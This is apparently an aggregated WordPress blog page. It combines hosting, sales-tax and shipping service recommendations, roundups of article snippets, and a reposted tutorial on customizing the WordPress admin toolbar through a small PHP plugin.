    Bluehost-WordPress-hostingBluehost – WordPress Hosting Solution

    I recommend Bluehost for your first website, blog or online store as it is so easy to get your site started and running with a one-click install of WordPress.

    With unlimited hosting and affordable pricing starting at $3.95 a month, you can't beat that. With access to the MOJO Marketplace, SSL included, and 24/7 support with in-house WordPress experts, they will get you up and running. And if you use WooCommerce, they have a plan with a pre-install of WordPress and WooCommerce.

    Avalara-eCommerce-Sales-Tax-solutionsAvalara – eCommerce Sales Tax Solution

    I recommend that if you are running a WooCommerce site, and sell products or services, you should explore how easy it is to integrate one of the top sales tax resources around – Avalara.

    As a store owner you cannot afford either the time to figure this out on your own or take the risk that you are not complying with specific tax codes based on your product, service and location. You pay a percentage of your sales, not a set monthly fee, so it's affordable for all sizes of businesses. With their wide range of offerings, for products and services, you will get tax relief with the help of the pros.

    Ship-Station-eCommerce-ShippingShipStation – eCommerce Shipping Solution

    I recommend all online sellers that have large quantities of products for sale to leave the shipping up to the pros. And for me, that is ShipStation.

    When it comes to making sure you are secure in your shipping needs, someone who understands all the variables that come with shipping, including all of the actual shipping options, it's best to leave it in the hands of the professionals. ShipStation can connect with all your online selling channels and find you some great rates from many of the top shippers.

    Source: Recommended WordPress and eCommerce Services

    #Blogging 101: Setting Up Your #Blog in #WordPress

    Blogging 101: Setting Up Your Blog in WordPress Setting up your blog in WordPress should be a pleasurable experience, but technology can tie us up in knots and intimidate us on the first try. Technical insight is a must-have when setting up a WordPress blog. Content Academy's Blogging 101: Setting Up ... read moreA guide to setting up Google Analytics for your WordPress site So, if you are an enthusiast who is setting up a website or a new blog using WordPress as your CMS, it is highly recommended to install Google Analytics to your WordPress site. A lot of visitors and subscribers visit your website daily and hence ... read moreHow To Add A Flipboard Sharing Button To Your #WordPress Blog Unfortunately, I never really gave it much attention, but a recent upsurge in traffic to my blog from it has convinced me to give it more attentiveness. However, WordPress ... can share your posts on their Flipboard account. You can set one up by going ... read more

    How to Create a Blog on WordPress in Three Easy Steps Keep all the boxes checked and click "Next." The next screen will install your WordPress blog! As you wait, Bluehost is setting up your login, as well as the more more technical side of your blog—like the database where all your posts will live. read more10 Top WordPress Themes for Fashion Blogs 2017 If you are searching for a theme for your Fashion Blog ... you can set up a mailing list and send weekly or monthly newsletters to your visitors. You can download the theme from or you can ... read moreBenefits of choosing WordPress for your business directory Wordpress has center part base administration and you can expand it as the need emerges for you and your association. You can set authorization levels of every client to keep up the security and trustworthiness of your site or blog. However a large group ... read more5 Simple Ways to Speed Up Your WordPress Blog Do you want to pull your hair out for a page or large photo to load? If so, then run through these five simple steps to get your site running faster. Most of these steps you only need to do or set up once ... to Speed Up Your WordPress Blog" right? read more10 WordPress Musician Themes to Tune Up Your Website The theme package includes pre-designed pages for all your needs and various versions of the header, footer, and blog layout ... it easy to set up the theme and then manage it. If you need a site with a content-rich layout, this WordPress musician theme ... read moreWhy WordPress is Best For Small Businesses Setting a website can seem a complete headache for mall businesses owners. But WordPress makes it practically easy to set up one and to ... you will find ton of blogs that offers useful tips on WordPress. As a result, you can solve your problem easily ... read moreThe Best Way To Set Up Redirects In Your WordPress Blog There are 101 reasons why you ... going 404 error crazy on the blog here recently, and with good reason – no one likes seeing them. But fear not – Redirection has an excellent feature that logs 404 errors: Setting up a redirect from one of these ... read more

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    Source: #Blogging 101: Setting Up Your #Blog in #WordPress

    Saturday, April 22, 2017

    How to Customize the WordPress ToolBar


    This article is part of a series created in partnership with SiteGround. Thank you for supporting the partners who make SitePoint possible.

    I have a love/hate affair with the dark grey toolbar introduced in WordPress 3.3. (It was previously named the Admin Bar in WordPress 3.1 and that name stuck for many — including the API authors!). Looking at the positives, the toolbar provides a consistent set of quick links when you're viewing the administration panels or the live website. That said, it can cause problems when creating themes or confuse site editors who think everyone can see it.

    WordPress toolbar

    Fortunately, it's easy to change the toolbar. We're going to achieve it using a custom WordPress plugin, but you could also consider adding identical code to your theme's functions.php file.

    The WordPress Admin Bar API

    The WP_Admin_Bar class provides the following methods:

  • add_node() — creates a new menu item (or child menu item) on the toolbar
  • remove_node() — remove a menu item from the toolbar
  • add_group() — allows toolbar items to be grouped into distinct sections
  • get_node() — returns a Toolbar object with the properties of a single toolbar item.
  • We're going to use add_node() and remove_node() in our new plugin…

    Create a New Plugin

    Create a new file in the WordPress wp-content/plugins/ folder named admin-bar.php then add the following plugin header:

    <?php /* Plugin Name: Admin Bar Plugin URI: Description: Modifies the WordPress admin bar Version: 1.0 Author: Craig Buckler Author URI: License: MIT */

    You can now activate this plugin in the WordPress administration panel. It won't do anything yet but you can make additions, save then refresh to view the updates.

    WordPress activate plugin

    Remove the Entire Toolbar

    Add the following line to the plugin code to remove the toolbar:

    // remove admin bar add_filter('show_admin_bar', '__return_false');

    Save then refresh to check that it's gone!

    Remove Toolbar Items

    Presuming you haven't removed the toolbar, you can remove existing items with the remove_node() method. For this, we need to create a new function named update_adminbar() which is passed an WP_Admin_Bar object ($wp_adminbar). This function is called when the admin_bar_menu action hook is activated:

    // update toolbar function update_adminbar($wp_adminbar) { // remove unnecessary items $wp_adminbar->remove_node('wp-logo'); $wp_adminbar->remove_node('customize'); $wp_adminbar->remove_node('comments'); } // admin_bar_menu hook add_action('admin_bar_menu', 'update_adminbar', 999);

    In this example we're removing the:

  • the "About WordPress" menu which is rarely necessary for post editors
  • the "Customize" theme editor, and
  • the "Comments" link (perhaps because we've disabled comments).
  • Save admin-bar.php then refresh to verify it worked.

    remove WordPress toolbar items

    You can remove any item by passing its ID to the remove_node() method. The ID can be found in the HTML source:

    WordPress toolbar item IDs

    Find the HTML ID then remove "wp-admin-bar-" from the start of the string to give you the toolbar menu ID name.

    Add New Toolbar Items

    The add_action() hook we called above sets a priority of 999. Any new menus we define in update_adminbar() will appear at the right-hand end of the toolbar after all other items. You can set a lower priority to use a different position. The WordPress logo has a priority of 10 with each additional toolbar item adding another 10 to that total. Therefore, using a priority of 11 would add items to the right of the WordPress logo, e.g.

    add_action('admin_bar_menu', 'update_adminbar', 11);

    We'll leave the priority at 999 because we're removing items which have to be added before we can remove them!

    Next, we'll add two new menu items which link to the SitePoint home page and the SitePoint Community Forums. The add_node() method accepts an associative array which defines a single toolbar item:

  • id — the toolbar item ID (required)
  • title — the toolbar item text. HTML tags are also permitted.
  • parent — the ID of the parent node (if the item is part of a sub-menu)
  • href — the link href attribute
  • group — makes the node a group (boolean). Group nodes are not visible in the toolbar, but nodes added to it are.
  • meta — an array of further link attributes: class, rel, onclick, target, title and tabindex. A special html value can set the HTML used for the node.
  • We can therefore add the SitePoint main menu and Forum sub-menu item in our plugin's update_adminbar() function:

    // update toolbar function update_adminbar($wp_adminbar) { // remove unnecessary items $wp_adminbar->remove_node('wp-logo'); $wp_adminbar->remove_node('customize'); $wp_adminbar->remove_node('comments'); // add SitePoint menu item $wp_adminbar->add_node([ 'id' => 'sitepoint', 'title' => 'SitePoint', 'href' => '', 'meta' => [ 'target' => 'sitepoint' ] ]); // add Forum sub-menu item $wp_adminbar->add_node([ 'id' => 'spforum', 'title' => 'Forum', 'parent' => 'sitepoint', 'href' => '', 'meta' => [ 'target' => 'sitepoint' ] ]); } // admin_bar_menu hook add_action('admin_bar_menu', 'update_adminbar', 999);

    Note: [] declares an array in PHP 5.4 and above. If you're using a previous version, replace it with array().

    Save admin-bar.php then refresh to see the new toolbar:

    Customized WordPress Toolbar

    You should now be able to create the perfect WordPress toolbar for every project!

    Source: How to Customize the WordPress ToolBar

    GeekWire Deals: Build a #Beautiful #WordPress site with this theme library

    GeekWire Deals: Build a beautiful WordPress site with this theme library In terms of web design, sites vary greatly in quality. Some are hard to navigate, some are hopelessly outdated, and some are mesmerizing. But not everyone knows how to design or has the resources to make it great. Today's GeekWire Deals offer makes it ... read moreOn MVPs, Gluing Things Together, and $270 Flights to South Africa. This is the story and technical details of how I started Amazing Airfare, an email and text message notification service for ridiculous deals ... Theme Forest and found an amazing $43 Wordpress template called Floyd. It won't last forever (a redesign of ... read moreNew WordPress Themes Released In March 2017 Other features are user coupon deals submission, various deal types, several payment gateways, affiliate module, custom fields on the submission form, manage the homepage, etc. Speciality WordPress theme ... can build beautiful pages for your site without ... read more

    Build beautiful WordPress sites with Ultra Theme by Themify Ultra Theme allows you to construct your own designs with a simple, powerful drag-n-drop editor. Taking WordPress into the realm of WYSIWYG site builders, Ultra Theme allows anyone with a rudimentary knowledge of WordPress to achieve impressive pro ... read moreHow Much Does It Really Cost to Build a WordPress Website? One of the questions we often get asked is: how much does it cost to build a WordPress website? While the core WordPress ... See our expert-pick of 43 beautiful free WordPress blog themes for some examples. Once you have chosen a WordPress template ... read moreThe Fastest and Cheapest Way to Build a Great-Looking Website for your Side Hustle Service [Case Study] One of the awesome things about WordPress is the extensive library of free and premium themes. That means you can start your website with a beautiful-looking template ... theme for the latest version of Side Hustle Nation. Searching for the perfect theme ... read moreWordPress v Joomla: Templates and Themes Welcome to Part 2 of our series covering all major aspects of the WordPress vs Joomla debate. Today we'll be covering templates, frameworks and themes for Joomla ... account when planning your website. If you need to make a certain page look different ... read moreAvada Theme Review: Is This The Ultimate WordPress Theme? Avada has generated more than 100,000 sales — making it one of the most popular premium WordPress themes the world has ever seen! The Avada demo does an excellent job of selling both the theme and the dream of being able to build a similar website ... read more30 Beautiful Websites Using The Popular Uncode WordPress Theme WordPress is a marvelous platform on which to build your website. But to add an aesthetic appeal to the website, to personalize and brand it, you need a great theme to go with it. One such awesome theme is Uncode. Uncode is a fairly recent addition to the ... read more

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    Source: GeekWire Deals: Build a #Beautiful #WordPress site with this theme library